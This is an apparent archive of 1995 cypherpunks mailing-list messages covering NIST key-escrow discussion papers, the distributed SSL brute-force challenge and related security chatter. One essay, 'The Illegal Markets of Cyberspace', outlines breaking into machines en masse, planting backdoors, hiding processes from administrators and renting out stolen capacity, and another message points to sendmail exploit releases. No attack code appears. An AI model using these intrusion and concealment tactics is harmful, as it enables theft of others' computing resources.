Date: Wed, 20 Sep 95 16:26:53 PDT
To: cypherpunks@toad.com
Subject: NIST KEY ESCROW MEETING
Message-ID: <9509201546255317@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Wed, 30 Aug 1995 07:51:07 +0200
To: cypherpunks@toad.com
From: Flame Remailer <remailer@flame.alias.net>
Subject: NIST Key Escrow meeting

Subject: NIST Key Escrow Meeting Discussion Papers

Key Escrow Issues Meeting, September 6-7, 1995
Discussion Paper #1


                      Issues -- Export of
                 Software Key Escrowed Encryption


On August 17, 1995, the Administration announced its proposal to
permit the ready export of software encryption provided that the
products use algorithms with key space that does not exceed 64
bits and the key(s) required to decrypt messages/files are
escrowed with approved escrow agents.  Under the proposal,
products will be reviewed to verify that they satisfy the
criteria and, if so, they will be transferred to the Commodity
Control List administered by the Department of Commerce where the
products can be exported under a general license (in much the
same way that 40-bit RC2/RC4 encryption is licensed today).

We are working toward creating broadly stated criteria that are
in the nature of performance specifications.  To meet these
criteria, encryption products will need to implement key escrow
mechanisms that cannot be readily altered or bypassed so as to
defeat the purposes of key escrowing.

The criteria, when finalized and published, will state the
objectives, but not the exact technical method(s), by which those
objectives are satisfied.  This is to provide software publishers
the flexibility to design methods for meeting our stated
objectives in a manner that is compatible with the design of
their products.  There are, therefore, a number of questions we
must work together to answer in order to draft effective
criteria.  These questions are:

*    Avoiding multiple encryption -- How can the product be
     designed so as to prevent doubling (or tripling, etc.) the
     key space of the algorithm?

*    Disabling the key escrow mechanism -- How can products be
     made resistant to alteration that would disable or
     circumvent the key escrow mechanism?  How can the "static
     patch" problem be avoided?  How can this be tested?

*    Access to escrow information -- What mechanisms must be
     designed into encryption products to allow authorized access
     to escrowed keys?  This likely includes the identity of the
     key escrow agent(s) and a serial number for the key escrow
     agent to use to identify the key(s)/component(s) necessary
     to decrypt the message.  What other information will be
     necessary to be provided to the escrow agent to identify the
     necessary key(s)/component(s)?  Are there other comparable
     viable approaches?

*    Non-escrowed use -- How can products be made so that they do
     not function with non-escrowed products (or tampered
     escrowed products)?  How can this be tested?

*    Limiting surveillance -- How can products be designed so
     that information both sent and received by the user can be
     decrypted without release of keys of other users?

*    Practical Key Access -- How can mechanisms be designed so
     that repeated involvement of escrow agents is not required
     for decryption for multiple files/messages during the
     specified access period?

*    Assurance that keys are escrowed -- How can it be assured
     that key escrow products are indeed satisfactorily escrowed?
     For example, products could be required to be escrowed at
     time of manufacture or be made inoperable until properly
     escrowed.

*    Ability to re-escrow keys -- How can products be designed so
     that new keys can be escrowed at the user's discretion with
     a U.S. Government approved escrow agent?

*    Certified escrow agents -- Can products be designed so that
     only escrow agents certified by the U.S. government
     (domestic, or under suitable arrangements, foreign) are
     utilized?  What should be the criteria for an acceptable
     U.S. escrow agent?

                         --------------

With your input, we are hopeful that this effort will lead to
definitive criteria, which will facilitate the development of
exportable products and help minimize the time required to obtain
export licenses.  The Administration seeks to finalize such
criteria and make formal conforming modifications to the export
regulations before the end of 1995.


Note:  These issues will be discussed at the Key Escrow Issues
Meeting to be held September 6-7, 1995 (9:00 a.m. - 5:00 p.m.) at
the National Institute of Standards and Technology (Gaithersburg,
Maryland).  The meeting will be open to the public, although
seating is limited.  Advance registration is requested, please
contact Arlene Carlton on 301/975-3240, fax: 301/948-1784 or e-
mail: carlton@micf.nist.gov.


8/25/94

                  -----------------------------
Key Escrow Issues Meeting, September 6-7, 1995
Discussion Paper #2


                      Discussion Issues:
         Desirable Characteristics for Key Escrow Agents


In the government's recent announcement of its intent to allow
the export of 64-bit software key escrow encryption products, one
stipulation was that the keys would be escrowed with an approved
key escrow agent.(*1)  Exactly what qualifications/considerations
are appropriate for approval as a key escrow agent have not been
defined.  Some of the issues which need to be discussed and
resolved include the following:

*    What kinds of organizations should be excluded from
     consideration as approved key escrow agents?

*    What sort of legal agreement between the government and the
     key escrow agent is necessary to stipulate the
     responsibilities of the agent?  Should this include the
     terms and conditions under which release of a key is
     required?

*    How will liability for unauthorized release of key be
     handled?

*    Should, for example, intentionally misreleasing or
     destroying a key be criminalized?  Should this include other
     actions?

*    How can the government's needs for confidentiality of key
     release be handled?

*    Should approval of key escrow agents be tied to a public key
     infrastructure (for digital signatures and other purposes)?

*    What procedures need to be developed for the storage and
     safeguarding of keys?

*    What are the acceptable performance criteria (e.g., around-
     the-clock availability, accessibility, reliability, etc.)
     for approved key escrow agents?

*    Under what circumstances will key escrow agents in foreign
     countries be approved?

*    What process will be used to approve escrow agents?
     Costs/who pays?
---------
(*1)  "Approved," for the purposes of this discussion, means that
the government (or its agent) has formally granted permission for
an organization to hold keys for exportable encryption products.


Note:  These issues will be discussed at the Key Escrow Issues Meeting
to be held September 6-7, 1995 (9:00 a.m. - 5:00 p.m.) at the National
Institute of Standards and Technology (Gaithersburg, Maryland).  The
meeting will be open to the public, although seating is limited.
Advance registration is requested, please contact Arlene Carlton on
301/975-3240, fax: 301/948-1784 or e-mail:  carlton@micf.nist.gov.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ab411@detroit.freenet.org (David R. Conrad)
Date: Wed, 30 Aug 95 03:56:52 PDT
To: cypherpunks@toad.com
Subject: Re: SSL search attacks
Message-ID: <199508301056.GAA26657@detroit.freenet.org>
MIME-Version: 1.0
Content-Type: text/plain




-----BEGIN PGP SIGNED MESSAGE-----

Scott Brickner <sjb@austin.ibm.com> writes:
>don@cs.byu.edu writes
>>A random (instead
>>of sequential) allocation _by the keyserver_ (out of unallocated 
>>piecemeal segments) would also take some work to implement. 
>
>The problem is that it's irrelevant to the problem.  Random allocation
>at the server is equivalent to simply "shuffling" the segments before
>assignment, which doesn't affect the rate at which the space is searched.

The point is that if J. Random Badguy knows that the key lies in segment
0x1bad and wants to get this segment and send a false NAK for it, he can
watch as key segments are doled out (perhaps with clients running on a
number of machines) and when 0x1bad gets close, say, when 0x1b0b comes
out, he can instruct all his clients to start hammering the server for
all they're worth in an attempt to get the key segment assigned to one
of his clients.

If the segments are shuffled before they are handed out then this attack
becomes impossible, since the attacker has no way of knowing when
segment 0x1bad will be handed out.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMERDPxEcrOJethBVAQG60gP9HsuCd+jID0nyESfXDCNtSwwRuRZ39rkg
SIEpltxzwMfHMQ/RD8CD5UmAHIm1EdvsztjbB5M5KnqjPKCMfw42leKhhcBBxUma
FCKN3vm4MBs+5vgM8SDeHLbn84rYxn5xijbktRdi+G/MzfAJdjmo5nUPQiWWhLn/
JyWa9rpNHxQ=
=9tcN
-----END PGP SIGNATURE-----

--
David R. Conrad, ab411@detroit.freenet.org, http://www.grfn.org/~conrad
Finger conrad@grfn.org for PGP 2.6 public key; it's also on my home page
Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
Jerry Garcia, August 1, 1942 - August 9, 1995.  Requiescat in pace.
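
The allocation-order point made in the message above, as an added Python sketch (not brloop or keyserver code from the list): a server that doles segments out sequentially lets any observer count down to a given segment, while one that orders them by a secret-keyed tag does not. The SegmentServer class, the helper names, the 0x2000-segment keyspace and the demo key are all constructed for this example.

```python
import hashlib
import hmac

N_SEGMENTS = 0x2000                      # constructed keyspace size
SHUFFLE_KEY = b"constructed-demo-key"    # a real server would use os.urandom()


class SegmentServer:
    """Doles out segment numbers and tracks which are still un-ACKed."""

    def __init__(self, n_segments, shuffle_key=None):
        if shuffle_key is None:
            self.order = list(range(n_segments))        # sequential doling
        else:
            # Order segments by HMAC(key, segment): a permutation that
            # nobody without the key can reproduce or extrapolate.
            def tag(seg):
                return hmac.new(shuffle_key, seg.to_bytes(4, "big"),
                                hashlib.sha256).digest()
            self.order = sorted(range(n_segments), key=tag)
        self.cursor = 0
        self.unacked = set()

    def request(self):
        """Next segment to search, or None when everything is reported."""
        if self.cursor < len(self.order):
            seg = self.order[self.cursor]
            self.cursor += 1
            self.unacked.add(seg)
            return seg
        # First pass finished: wrap around to assigned-but-unreported work.
        for seg in self.order:
            if seg in self.unacked:
                return seg
        return None

    def ack(self, seg):
        """A client reported on this segment."""
        self.unacked.discard(seg)


def issue_all(server):
    """Issue order of the first pass over the whole keyspace."""
    return [server.request() for _ in range(len(server.order))]


def successor_hit_rate(issued):
    """How often 'the next segment is the last one plus 1' is right."""
    hits = sum(1 for a, b in zip(issued, issued[1:]) if b == a + 1)
    return hits / (len(issued) - 1)


def requests_between(issued, seen, target):
    """Requests separating an observed segment from a target segment."""
    return issued.index(target) - issued.index(seen)


if __name__ == "__main__":
    seq = issue_all(SegmentServer(N_SEGMENTS))
    shuf = issue_all(SegmentServer(N_SEGMENTS, SHUFFLE_KEY))
    print("sequential: 0x1bad follows 0x1b0b after",
          requests_between(seq, 0x1B0B, 0x1BAD), "requests")
    print("sequential next-segment predictability:", successor_hit_rate(seq))
    print("shuffled   next-segment predictability:", successor_hit_rate(shuf))
```

Shuffling only removes the timing signal; a false report on a segment is a separate problem that the ordering does not address.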




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Flame Remailer <remailer@flame.alias.net>
Date: Tue, 29 Aug 95 22:51:38 PDT
To: cypherpunks@toad.com
Subject: NIST Key Escrow meeting
Message-ID: <199508300551.HAA17047@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Subject: NIST Key Escrow Meeting Discussion Papers

Key Escrow Issues Meeting, September 6-7, 1995
Discussion Paper #1


                      Issues -- Export of
                 Software Key Escrowed Encryption


On August 17, 1995, the Administration announced its proposal to
permit the ready export of software encryption provided that the
products use algorithms with key space that does not exceed 64
bits and the key(s) required to decrypt messages/files are
escrowed with approved escrow agents.  Under the proposal,
products will be reviewed to verify that they satisfy the
criteria and, if so, they will be transferred to the Commodity
Control List administered by the Department of Commerce where the
products can be exported under a general license (in much the
same way that 40-bit RC2/RC4 encryption is licensed today).

We are working toward creating broadly stated criteria that are
in the nature of performance specifications.  To meet these
criteria, encryption products will need to implement key escrow
mechanisms that cannot be readily altered or bypassed so as to
defeat the purposes of key escrowing.

The criteria, when finalized and published, will state the
objectives, but not the exact technical method(s), by which those
objectives are satisfied.  This is to provide software publishers
the flexibility to design methods for meeting our stated
objectives in a manner that is compatible with the design of
their products.  There are, therefore, a number of questions we
must work together to answer in order to draft effective
criteria.  These questions are:

*    Avoiding multiple encryption -- How can the product be
     designed so as to prevent doubling (or tripling, etc.) the
     key space of the algorithm?

*    Disabling the key escrow mechanism -- How can products be
     made resistant to alteration that would disable or
     circumvent the key escrow mechanism?  How can the "static
     patch" problem be avoided?  How can this be tested?

*    Access to escrow information -- What mechanisms must be
     designed into encryption products to allow authorized access
     to escrowed keys?  This likely includes the identity of the
     key escrow agent(s) and a serial number for the key escrow
     agent to use to identify the key(s)/component(s) necessary
     to decrypt the message.  What other information will be
     necessary to be provided to the escrow agent to identify the
     necessary key(s)/component(s)?  Are there other comparable
     viable approaches?

*    Non-escrowed use -- How can products be made so that they do
     not function with non-escrowed products (or tampered
     escrowed products)?  How can this be tested?

*    Limiting surveillance -- How can products be designed so
     that information both sent and received by the user can be
     decrypted without release of keys of other users?

*    Practical Key Access -- How can mechanisms be designed so
     that repeated involvement of escrow agents is not required
     for decryption for multiple files/messages during the
     specified access period?

*    Assurance that keys are escrowed -- How can it be assured
     that key escrow products are indeed satisfactorily escrowed?
     For example, products could be required to be escrowed at
     time of manufacture or be made inoperable until properly
     escrowed.

*    Ability to re-escrow keys -- How can products be designed so
     that new keys can be escrowed at the user's discretion with
     a U.S. Government approved escrow agent?

*    Certified escrow agents -- Can products be designed so that
     only escrow agents certified by the U.S. government
     (domestic, or under suitable arrangements, foreign) are
     utilized?  What should be the criteria for an acceptable
     U.S. escrow agent?

                         --------------

With your input, we are hopeful that this effort will lead to
definitive criteria, which will facilitate the development of
exportable products and help minimize the time required to obtain
export licenses.  The Administration seeks to finalize such
criteria and make formal conforming modifications to the export
regulations before the end of 1995.


Note:  These issues will be discussed at the Key Escrow Issues
Meeting to be held September 6-7, 1995 (9:00 a.m. - 5:00 p.m.) at
the National Institute of Standards and Technology (Gaithersburg,
Maryland).  The meeting will be open to the public, although
seating is limited.  Advance registration is requested, please
contact Arlene Carlton on 301/975-3240, fax: 301/948-1784 or e-
mail: carlton@micf.nist.gov.


8/25/94

                  -----------------------------
Key Escrow Issues Meeting, September 6-7, 1995
Discussion Paper #2


                      Discussion Issues:
         Desirable Characteristics for Key Escrow Agents


In the government's recent announcement of its intent to allow
the export of 64-bit software key escrow encryption products, one
stipulation was that the keys would be escrowed with an approved
key escrow agent.(*1)  Exactly what qualifications/considerations
are appropriate for approval as a key escrow agent have not been
defined.  Some of the issues which need to be discussed and
resolved include the following:

*    What kinds of organizations should be excluded from
     consideration as approved key escrow agents?

*    What sort of legal agreement between the government and the
     key escrow agent is necessary to stipulate the
     responsibilities of the agent?  Should this include the
     terms and conditions under which release of a key is
     required?

*    How will liability for unauthorized release of key be
     handled?

*    Should, for example, intentionally misreleasing or
     destroying a key be criminalized?  Should this include other
     actions?

*    How can the government's needs for confidentiality of key
     release be handled?

*    Should approval of key escrow agents be tied to a public key
     infrastructure (for digital signatures and other purposes)?

*    What procedures need to be developed for the storage and
     safeguarding of keys?

*    What are the acceptable performance criteria (e.g., around-
     the-clock availability, accessibility, reliability, etc.)
     for approved key escrow agents?

*    Under what circumstances will key escrow agents in foreign
     countries be approved?

*    What process will be used to approve escrow agents?
     Costs/who pays?
---------
(*1)  "Approved," for the purposes of this discussion, means that
the government (or its agent) has formally granted permission for
an organization to hold keys for exportable encryption products.


Note:  These issues will be discussed at the Key Escrow Issues Meeting
to be held September 6-7, 1995 (9:00 a.m. - 5:00 p.m.) at the National
Institute of Standards and Technology (Gaithersburg, Maryland).  The
meeting will be open to the public, although seating is limited.
Advance registration is requested, please contact Arlene Carlton on
301/975-3240, fax: 301/948-1784 or e-mail:  carlton@micf.nist.gov.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@it.kth.se>
Date: Tue, 29 Aug 95 22:54:33 PDT
To: cypherpunks@toad.com
Subject: The illegal markets of cyberspace
Message-ID: <199508300554.HAA01155@piraya.electrum.kth.se>
MIME-Version: 1.0
Content-Type: text/plain



I guess I'll get a bunch of cypherpunkers on me now,
even though I have the disclaimers/clarifications there.
I am not opposed to anonymous services at all, ok?

The initial idea behind this note, my main conclusion,
is that NSA and others won't be able to estimate the amount
of free computing power available "out there". The note
outlines what I consider a probable scenario that will
invalidate their estimates by a few orders of magnitude.
If that is not enough, one can always bring out the big 
jack hammer: A combined Internet Worm/SSL Bruter kidnapping
the net for a number of hours.

/Christian

----

To: Risks Digest

This is a short note I wrote the other day. It points out
a potential future risk, and also shows existing problems
with the FSP "proto-market". 

Also note that I am not opposed to anonymous services per se,
I am only pointing out possible misuses of the technology. 
There are just as big risks in not deploying encryption and
anonymous services, in going forward with a world without 
privacy and private spaces.

/Christian


THE ILLEGAL MARKETS OF CYBERSPACE
by Christian Wettergren, cwe@it.kth.se

Given the recent Brute-SSL efforts, together with the BlackNets
and an eventual ecash exchange, there is a quite interesting 
situation emerging. The future markets of Cyberspace will
be trading computing power, storage capacity and communications 
bandwidth, in addition to the more usually mentioned goods. This
market for computing capabilities can be used for legitimate purposes
as well as for illegal ones. I will here concentrate on the illegal
uses, since they will prove to be a challenge to control.

Computing power can yield pay-off in actual money, as the bruteSSL
effort has quite convincingly shown. This can create a market for 
hiring computing power for illegal purposes. The actors on such a
market can be quite safe, given the anonymity of the BlackNet and the
tracelessness of ecash (DigiCash). There are other goods on the
market as well; storage capacity and communication bandwidth.

How would such a market be operated?

The supply of "goods" for the market could be created by  hackers
breaking in to other's systems and hiring out the stolen capacity.

The intruder could install a backdoor into a foreign system that would
accept issued cryptographic access codes that would expire after a
certain amount of time or usage. This makes it possible for the
intruder to operate the business without having to go near the "scene
of the crime". There is of course a certain risk that the intruder
might lose the system to the hiring party, but that isn't such a big
deal, since first of all it's not his system, and second of all he may
have booby-trapped the system for this case.

The intruder would break into computers en masse, and install the
backdoors as indicated above. They would then offer the stolen
merchandise onto a BlackNet-like arrangement. Potential buyers would
express their interests, and the broker of the BlackNet would connect
the two together.

The buyer and seller would agree on a price. The buyer would deposit
the access codes, the seller the anonymous ecash by the broker, and
the broker would effect the deal, taking a share of the profit. The
buyer can then exchange his ecash for real money, or do whatever he
wants with it. The seller brutes away onto whatever he wants, why not
the SWIFT international banking system?

The usage of stolen CPU cycles must of course be done in a careful
way. The intruder would probably install some safeguards against
excessive use, in his own interest. These safeguards could feature:

* only using spare cycles,
* monitoring superuser and sysadm activities,
* hiding the process from system utilities like ps,
* backing off during daytime hours etc.

Other merchandise

Storage capacity can be traded in a similar way, by setting up
backdoor file server processes that listen for the proper access
codes. This kind of capacity could be used as anonymous post boxes,
where you store secrets that you don't want to store at home, even if
they are encrypted. It could also be used for bulk storage if it is
cheaper than buying a new harddrive. Since this storage isn't offered
by the proper owner, he can easily be very competitive. :-)

There are of course a number of catches trading with stolen disk
capacity, but they can quite easily be circumvented. To counter the
privacy issue, all stored files will be encrypted by the submitter.
This also eliminates potential evidence, if the proper owner discovers
the illegal use of his resources. 

There is also a certain risk of losing the files if the area is
discovered. This can be countered by storing the files in several
locations. 

There is a third risk of traffic analysis of the file server. This
analysis can be complicated by having a system of file servers that
exchange files with each other, moving them around. In this scheme a
buyer can submit a file in one location, and it can be stored in a
totally different location. It will take a concerted action by several
system owners to track down all their unwanted guests, so it is more
likely they will only shut down the file server on their own system. 

Underground bases

Trading communication bandwidth is somewhat more involved than the two
previous ones, and cannot be traded without a portion of disk and cycles. 
It can however be worth a great deal to a potential buyer. 

Buyers of communication bandwidth are most likely setting up a service
that is sold for profit. This service can probably not tolerate
day-light and accountability, and hence needs to be anonymous. A good
example of such a service is the emerging FSP-server black market,
which has been soaring during the last year and a half. (There have
been lists circulating with several hundreds of FSP servers.)

An FSP server is an anonymous file server where the users can freely
upload and download files. These "black markets" of file exchanges have
been used to trade porn, pirated music and pirated software. A site in
Sweden recently caught students that had started such a server. 3
Gb/day went out through the server, and an estimated worth of $2
million in pirated PC programs were exchanged over it during its
three weeks of operation. 

The high volumes in the server were mainly due to the large amounts of
available bandwidth out from the site. The example is not entirely
good, since there is no money or ecash exchange in this case. The
thing traded currently in the FSP business is instead the mere
existence of a server, trading one piece of server access info for
another. This is mainly because of lack of features in the FSP code,
and not a fundamental feature of any such market.

Communication bandwidth/service space rental is traded in a similar
way as the other merchandise over the BlackNet system, with ecash
exchange. The service provider will probably keep on using the site
until the proper owner discovers it, since it is a hassle to move the
service while running.

What is the size of this potential market?

I consider the estimates below conservative. Any illegal  market would
probably be much bigger, and constantly try to expand. 

Internet now has well over 3 million reachable computers. Let's assume 1
percent of them could be broken into at any one time, i.e. 30.000
computers.

Each computer is probably good for 5-10 MIPS, but assume we can use on
average 1 MIPS without risk of discovery. (We can probably use more
during non-office hours, but maybe nothing during the day.) You can
certainly use 10 Mb of disk storage on each computer without
problems. 

This adds up to a constant 30 GIPS in computing power, and 300 Gb's of
storage. And I believe this is a very conservative estimate, as I
said.

Conclusions

I think it is quite likely that markets similar to those described
above will emerge in a few years. There is already one primitive
example of such a market in the FSP business, and we will most likely
see more elaborate forms soon. The development will accelerate once
there are targets which will yield interesting pay-offs.

Another conclusion is that all current estimates on available privately
available CPU power for bruteforcing are likely to be _wrong_ in the
face of such markets. The net has now shown several cases of doing the
supposedly impossible; RSA-129, SSL1, SSL2, RC40 etc.

The SSL2 effort, although impressive, I believe has only revealed a
minuscule piece of what is possible to do. Observe that the current
effort has all used volunteers, has not used any of the easily
accessible super computers on the net, nor has used any intrusion
techniques to round up CPU. 

The ultimate technique would be to have a well-written worm raid the
Net for CPU power, maybe only being active for a few hours. The worm
could penetrate a substantial fraction of the Internet, if fed the
right database of possible attacks on different vendors.

The last, and most obvious conclusion perhaps, is that all sites
should be concerned about their security. There is more to steal in
your system than your supposedly worthless information, and I would
say that the laws are quite unclear on the issue of liability in any
of the above situations. At least if you haven't taken proper
precautions.

By the way, the above mechanisms can be used to create perfectly legit
and proper markets as well. Don't confuse the phenomena with the
techniques. 

[BlackNet is a creation of Tim May <tcmay@got.net>, and possibly
other cypherpunkers. A black market broker announces a public key widely
on Internet, stating the market's existence. Potential buyers and sellers
encrypt their requests and offers with the public key and post the 
encrypted info in a newsgroup somewhere. The broker can then match up 
buyers and sellers. Ecash can be used to transfer funds, and the broker
will get his share of the deal. This scheme is close to impossible to 
traffic analyse.]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Wed, 30 Aug 95 08:26:43 PDT
To: starrd@iia2.org
Subject: Re: Sendmail Bugs
Message-ID: <9508301523.AA22241@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> > There is a document on alt.security which describes exploitable sendmail
> > bugs. The reference is <809544856snz@hacknet.demon.co.uk>
> > I saved a copy in case anyone would like one.
> 
> Would you please email me a copy of that doc-file?
> 
> I would find it very interesting... :-^)
> 

8lgm has released a lot more of their exploit information to the public
as well including a lot of sendmail stuff...I wouldn't be surprised if
that was the source of this.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Donald M. Kitchen" <don@cs.byu.edu>
Date: Wed, 30 Aug 95 08:11:50 PDT
To: cypherpunks@toad.com
Subject: Non-US SSL128 site
Message-ID: <199508301510.JAA11086@bert.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Saw this on usenet. Figured someone might want to give it a spin...

From: John Hemming - Chief Executive MarketNet <johnhemming@mkn.co.uk>
Newsgroups: sci.crypt
Subject: Announce>128 bit RC4 SSL available outside US
Date: 30 Aug 1995 10:16:39 GMT
Message-ID: <421dq7$rk4@marble.Britain.EU.net>
NNTP-Posting-Host: 193.119.26.63

We have now updated our servers to

a) Use 128 bit SSL if the client allows it.
b) Tell users which cipher is being used on a secure session.

To experiment point your secure client at one of the following:

https://193.118.187.101/
https://193.118.187.102/
https://193.118.187.105/
https://193.118.187.111/

(the main server does not run SSL to minimise PK calculations)

If you do not have a client that can use 128 bit RC4 then
ftp://193.119.26.70/mktnet/pub/horse.zip
does the job, but is quite flaky otherwise.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: goedel@tezcat.com (Goedel@tezcat.com)
Date: Wed, 20 Sep 95 16:29:35 PDT
To: cypherpunks@toad.com
Subject: SSL SUGGESTIONS
Message-ID: <9509201546285327@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Wed, 30 Aug 1995 03:14:10 -0600
To: cypherpunks@toad.com
From: goedel@tezcat.com (Dietrich J. Kappe)
Subject: SSL Suggestions

-----BEGIN PGP SIGNED MESSAGE-----

Many people have suggested improvements to the techinical side of brutessl.
I don't think anyone has looked at the user interface side of things. A
simple configure script, and a few more reasonable defaults would bring
quite a few more volunteers. I know of at least a handful of people who did
not contribute because they were overwhelmed by the unfriendly scripts.

While a rough user interface could serve as a basic intelligence test, I
don't think that this sort of exclusion is necessary, given the nature of
the task.

DJK

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBgAwUBMEQrvHIf3YegbdiBAQE1pAJYnoXhffJeTrfiEm8R1fDGMuuZCpATw9gL
M+A+LawHiPFeoHtcHp3ZBkhzOqEFS6MfMJ1wjbt9e3ILSJkVGC71OrkpiNcDBMKY
0G9G
=3NIJ
-----END PGP SIGNATURE-----

Dietrich J. Kappe | Red Planet    http://www.redweb.com/
Red Planet, L.L.C.|         "Chess Space"              /chess
1-800-RED 0 WEB   |      "MS Access Products"          /cobre
Web Publishing    |        PGP Public Key              /goedel/key.txt







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Wed, 30 Aug 95 09:42:45 PDT
To: Piete.Brooks@cl.cam.ac.uk
Subject: Re: SSL brute/ng
Message-ID: <9508301633.AA22586@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> > would they like to consider some sort of mirroring approach for the server
> > (at least on stats or updates/software)
> 
> Not sure what you mean ....

I think he wants to http to one of several machines to get the stats, each
of which contain a mirrored copy of the stats.  The cgi-bin script could
do a redirect to make this happen if you wanted.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "W. Kinney" <kinney@bogart.Colorado.EDU>
Date: Wed, 30 Aug 95 09:00:09 PDT
To: cypherpunks@toad.com
Subject: Re: Non-US SSL128 site
In-Reply-To: <199508301510.JAA11086@bert.cs.byu.edu>
Message-ID: <199508301559.JAA05610@bogart.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain


 
> a) Use 128 bit SSL if the client allows it.
> b) Tell users which cipher is being used on a secure session.

Interesting. When I connect, both from my Unix box at work and my Mac at
home, I'm told the connection is "40 bits RC4". I'm running Netscape 1.1.
I guess this makes sense, since if freely distributed clients were 128-bit
capable, then foreign users would still get 128-bit security when connecting
to U.S. servers.

Netscape's press release on the RC4-40 crack seems to have disappeared from
their home page, but I don't remember any specific mention of 128-bit
U.S.-only clients, just servers.

So what's up?

                                -- Will



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Tue, 29 Aug 95 17:24:53 PDT
To: sjb@austin.ibm.com (Scott Brickner)
Subject: Re: Florida Drivers Permits and a Hello
In-Reply-To: <9508291847.AA12145@ozymandias.austin.ibm.com>
Message-ID: <199508292315.AA20208@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>What possible value could the LEAs get by having your thumbprint digitally
>encoded on your driver's license?  It's not like the average cop-on-the-beat
>is qualified to lift a fingerprint and compare it.  Even if he was, how
>does it benefit that the fingerprint is on the license?

Here it is possible to walk into a suitably equipped police station, put your
fingertips on a sensor pad and a few seconds later, if records exist, have them appear
on the computer screen. Extrapolating this, it isn't a big step for a patrol
car, already equipped with a packet radio link to HQ and a data terminal,
to scan in your fingerprint and check it. If the system was offline they could
easily take your print and compare it to that on your license. It's just a
little more proof that the license is linked to you.

Mark
mark@lochard.com.au
The above opinions are rumoured to be mine.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 30 Aug 95 07:35:22 PDT
To: cypherpunks@toad.com
Subject: More Disintermediation
Message-ID: <199508301433.KAA04944@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


According to Monday's USA Today, the Customs Service has come up with a plan
to stop stopping international travelers arriving at US airports.
Apparently they can't afford "personal" service any more.  With 60 million
arrivals, Customs has decided to mingle a bit in luggage claim, look for
those meeting its profiles, and use drug- and food-sniffing dogs to catch
smugglers.

Note that international travel has doubled in the last few years.  What is
Customs (and La Migra) going to do when it doubles again?  It is much easier
for market phenomena like this to double or triple than it is for
government agencies to double or triple.  

Markets scale well.  Governments don't.

DCF

"When foreigners steal 'our' jobs, our labor is freed for other tasks and
total world product increases.  Jobs can no more 'run out' than desire for
things in general can 'run out'."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <asb@nexor.co.uk>
Date: Wed, 30 Aug 95 02:37:00 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Subject: ANNOUNCE: 2nd SSL challenge - we need your compute!
In-Reply-To: <199508241543.LAA07735@panix.com>
Message-ID: <Pine.SOL.3.91.950830103304.24824G-100000@eagle.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 24 Aug 1995, Duncan Frissell wrote:

> The 32-bit Windows version does *not* work with my old Windows 3.11 even
> with the latest Microsoft 32-bit add in.

The Win32 client is multi-threaded.  Win32s doesn't support multi 
threading and has a whole host of other things missing too.  Win95 claims 
to support threads, although I heard "not many".


- Andy

+-------------------------------------------------------------------------+
| Andrew Brown  Internet <asb@nexor.co.uk>  Telephone +44 115 952 0585    |
| PGP (2048/9611055D): 69 AA EF 72 80 7A 63 3A  C0 1F 9F 66 64 02 4C 88   |
+-------------------------------------------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <asb@nexor.co.uk>
Date: Wed, 30 Aug 95 02:46:21 PDT
To: Joe Thomas <jthomas@access.digex.net>
Subject: Re: SSL CHALLENGE: Can't search with Win32 client!
In-Reply-To: <Pine.SUN.3.91.950824144329.9284B-100000@access5.digex.net>
Message-ID: <Pine.SOL.3.91.950830103622.24824H-100000@eagle.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 24 Aug 1995, Joe Thomas wrote:

> I've got some keyspace, from various projects and test projects on the 
> server, but no matter what key range I select, I can't get the Search 
> button to be active (not greyed out).

The project must be of type "ssl" (look at the properties box to make 
sure).  ssl is the only search engine currently built in to the client, 
more will be added as challenges are planned.

Piete: I notice that you've renamed the original challenge to "sslold" 
and the test to "sslck" which causes the client to not recognise them!  
